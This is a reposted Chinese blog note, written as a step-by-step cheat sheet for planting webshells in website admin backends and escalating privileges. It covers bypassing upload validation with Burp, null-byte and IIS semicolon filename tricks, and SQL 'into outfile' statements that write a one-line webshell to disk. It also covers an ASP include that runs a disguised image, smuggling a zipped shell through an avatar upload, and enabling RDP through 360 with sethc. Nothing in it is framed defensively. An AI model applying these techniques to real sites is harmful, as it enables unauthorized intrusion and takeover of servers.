后台插马及提权笔记

本地js验证突破
可用burp抓包,改后缀
可查看本地js文件,修改js代码

360提权:
360.exe 后加port 开启3389
360.exe sethc

00截断:xx.asp%00.jpg

解析漏洞:xx.asp;.jpg

admin/editor/admin_uploadfile.asp?id=&dir 列目录 ../返回上一级

可利用后台服务器端脚本代码,闭合和编辑方式插入一句话

数据库执行拿shell:
create table 表名(cmd text not null); 建表
insert into 表名 values('一句话×××'); 一句话存库
select cmd from 表名 into outfile("绝对路径");以文件形式输出
drop table if exists 表名 删除表

asp文件包含之后,当做asp脚本执行
<!--#include file="马子.jpg"-->

win03装网站:
添加删除角色->自定义->IIS->两个选项都勾上->下一步
配置
active server pages 服务开启

会员头像上传拿webshell
大马放进文件夹,压缩zip
抓图片包 删除图片数据 选择paste from file 选择zip马子
HTTP history 历史记录看上传路径

cmd执行不成功的情况下,找拥有可读可写权限的文件夹,上传cmd
执行时,也需要更换大马cmd路径

转载于:https://blog.51cto.com/3945465/2147134

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值